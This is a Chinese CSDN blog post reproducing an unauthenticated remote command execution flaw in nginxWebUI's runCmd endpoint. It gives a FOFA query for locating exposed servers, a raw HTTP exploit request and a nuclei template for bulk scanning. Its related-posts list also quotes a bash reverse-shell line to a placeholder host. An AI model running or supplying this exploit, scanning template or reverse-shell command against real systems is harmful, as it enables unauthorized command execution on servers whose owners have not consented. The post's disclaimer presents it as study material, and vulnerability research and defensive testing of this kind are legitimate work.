nginxWebUI runCmd前台远程命令执行漏洞

于 2024-01-29 10:21:04 发布
阅读量336 收藏 1
点赞数 6
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62352348/article/details/135906243
版权
本文介绍了nginxWebUI中存在未过滤用户输入的任意命令执行漏洞,攻击者可通过构造特定payload在Web界面执行任意命令。复现方法和Fofa查询语句也一并给出,强调了其高危性和安全防范重要性。
摘要由CSDN通过智能技术生成

免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

漏洞描述

nginxWebUI是一款图形化管理nginx配置的工具,nginxWebUI由于未对用户的输入进行严格过滤,导致任意命令执行漏洞。该漏洞利用条件简单,漏洞危害较高。

fofa语句

"nginxWebUI"

漏洞复现

打开页面

1706022988322.png

构造payload

1706023096516.png

GET /AdminPage/conf/runCmd?cmd=id HTTP/1.1
Host: 
Cookie: SOLONID=ab4603d571394000a48398f2383fdc26; Hm_lvt_8acef669ea66f479854ecd328d1f348f=1705042515; Hm_lpvt_8acef669ea66f479854ecd328d1f348f=1705042611
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://192.168.18.128:8080/
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate

nuclei批量验证

1706022945254.png


id: nginxWebUI-runCmd-RCE

info:
  name: nginxWebUI runCmd前台远程命令执行漏洞
  author: changge
  severity: critical
  description: nginxWebUI是一款图形化管理nginx配置的工具,nginxWebUI由于未对用户的输入进行严格过滤,导致任意命令执行漏洞。该漏洞利用条件简单,漏洞危害较高。
  metadata:
    max-request: 1
    fofa-query: "nginxWebUI"
    verified: true
http:
  - raw:
      - |
        GET /AdminPage/conf/runCmd?cmd=id HTTP/1.1
        Host: {{Hostname}}
        Cookie: SOLONID=ab4603d571394000a48398f2383fdc26; Hm_lvt_8acef669ea66f479854ecd328d1f348f=1705042515; Hm_lpvt_8acef669ea66f479854ecd328d1f348f=1705042611
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Referer: {{BaseURL}}
        Upgrade-Insecure-Requests: 1
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Encoding: gzip, deflate

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"uid") && status_code == 200'

微信公众号:AY长歌

github poc总汇地址:https://github.com/AYcg/poc

长歌1001
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现 || NginxWebUI 后台命令执行&runCmd远程命令执行
失心少年
07-05 748
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令。并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果。1.前台使用GET方式利用如下POC执行id命令
nginxWebUI 存在前台远程命令执行漏洞,安装以及复现过程
lianhe20040122的博客
11-07 357
方便快捷易用的Nginx可视化UI网页管理部署配置工具系统,使用Web网页系统来快速配置部署,支持在线配置你的Nginx/Openresty的反向代理、负载均衡、SSL/HTTPS证书免费签发,自动续签、TCP/UDP 3-4层转发、可以自定义参数字段、均衡负载节点、Nginx服务状态监控故障报警、集群配置同步等,快速部署多个或N个Nginx集群节点,支持导入现有Nginx配置文件让你无忧使用。
nginxWebUI 远程命令执行漏洞
m0_49025459的博客
06-29 885
nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令
NginxWebUI run Cmd远程命令执行漏洞
holyxp的博客
06-28 2069
nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。​ nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令
漏洞复现】nginxWebUI 存在前台远程命令执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-09 2109
nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。nginxWebUI 存在前台远程命令执行漏洞,攻击者通过该漏洞获取服务器控制权限进而进一步获取敏感数据信息。
NginxWEBUI框架RCE任意命令执行漏洞深度分析(含Poc和EXP)
qq_29616295的博客
08-18 1110
NginxWEBUI任意命令执行漏洞深度解析
漏洞复现-nginxWebUI runCmd前台远程命令执行漏洞(附漏洞检测脚本)
最新发布
jjjj1029056414的博客
01-14 791
漏洞复现-nginxWebUI runCmd前台远程命令执行漏洞,附带自己写的poc脚本
如何使用Go语言实现远程执行命令
09-21
在Go语言中,远程执行命令通常涉及到SSH(Secure Shell)协议,这是一种用于安全网络服务,特别是远程登录的标准。通过SSH,我们可以将命令发送到远程服务器并获取执行结果,这对于管理和维护大量服务器集群非常有用...
Java中通过jsch来连接远程服务器执行linux命令
10-22
在`main`方法中,我们调用`versouSshUtil`方法来建立与远程服务器的连接,然后使用`runCmd`方法执行指定的命令。这两个方法的定义如下: ```java public static void versouSshUtil(String host, String userName, ...
docker run起来之后执行多条命令
09-30
docker run :创建一个新的容器并运行一个命令。这篇文章主要介绍了docker run起来之后执行多条命令 ,需要的朋友可以参考下
Zabbix远程执行命令的示例详解
01-09
特别需要注意的是,Zabbix的远程命令执行是由服务器端向agent端发起的,不支持主动模式的agent,也不支持代理模式。此外,执行命令的Zabbix用户需要有相应的权限,通常可以通过sudo配置来无密码执行root权限的命令。...
Test_RunCMD.zip
07-01
本项目"Test_RunCMD.zip"是一个基于C#语言的Winform应用程序,旨在演示如何在C#环境下调用CMD命令提示符)来执行命令和BAT(批处理)文件。下面将详细阐述相关知识点: 1. **C#调用CMD执行命令**: 在C#中,可以...
nginx文件路径处理远程命令执行漏洞(转)
weixin_33834679的博客
01-18 840
转自:http://www.safe.sh/security/?type=detail&id=1606另参考:http://hi.baidu.com/higkoo/item/ed1e0cc9b9d7b3d6964452f1影响版本:Igor Sysoev nginx 0.8.xIgor Sysoev nginx 0.7.xIgor Sysoev nginx 0.6.x...
nginxWebUI 存在前台远程命令执行漏洞
nnn2188185的博客
07-20 181
nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。
web漏洞远程命令/代码执行
qq_56438857的博客
07-30 902
总结了常见的远程命令/代码执行漏洞的相关知识点。主要包括管道符,远程代码执行远程系统命令执行
nginx文件路径处理远程命令执行漏洞
qq_36028750的博客
03-22 921
nginx文件路径处理远程命令执行漏洞 详细描述: nginx是多平台的HTTP服务器和邮件代理服务器。 nginx可以被配置为以CGI的方式支持PHP的运行,nginx在处理PHP脚本文件路径的解析时存在问题。如果网站允许上传文件,而且上传文件路径可得到,远程攻击者可以利用此漏洞上传包含恶意代码的文件并得到执行,实现以Web进程权限执行任意命令。 解决办法:修改nginx的配置文件。 ①首先修改 fastcgi.conf文件,改为如下内容: if ($request_filename ~* (.*)\.p
Web渗透中的反弹Shell与端口转发的奇淫技巧
大方子
10-02 9565
奇淫技巧 0x00 前言 在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结. 0x01 反弹shell 1) Bash 部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口   bash -i >& /dev/tcp/x.x.x.x/2333 0&g...
nginxwebui-RCE漏洞复现
weixin_68999845的博客
09-21 756
nginxWebUI后台提供执行nginx相关命令的接口(/AdminPage/conf/runCmd),由于未对用户的输入进行过滤,导致可在后台执行任意命令。该漏洞属于命令拼接漏洞,所以可使用WAF进行防护。并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果。1./AdminPage/conf/runCmd后跟RCE_payload后紧跟&&nginx。该漏洞触发接口点为后台功能点,但攻击者不需要用户验证即可访问该url触发漏洞
CVE-2019-11043 Nginx PHP 远程代码执行漏洞复现
墨鱼菜鸡
10-24 291
漏洞背景:来自Wallarm的安全研究员Andrew Danau在9月14-16号举办的Real World CTF中,意外的向服务器发送%0a(换行符)时,服务器返回异常信息。由此发现了这个0day漏洞 漏洞描述:当Nginx使用特定的 fastcgi 配置时,存在远程代码执行漏洞,但这个配置并非是Ng...
nginxwebui runcmd
09-27
使用 nginxwebui runcmd,用户可以方便地执行各种 Nginx 相关的命令,无需使用命令行界面。这个工具包括了常见的 Nginx 操作,如启动和停止 Nginx 服务器、重载配置文件、查看服务器状态等。用户可以通过简单的点击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值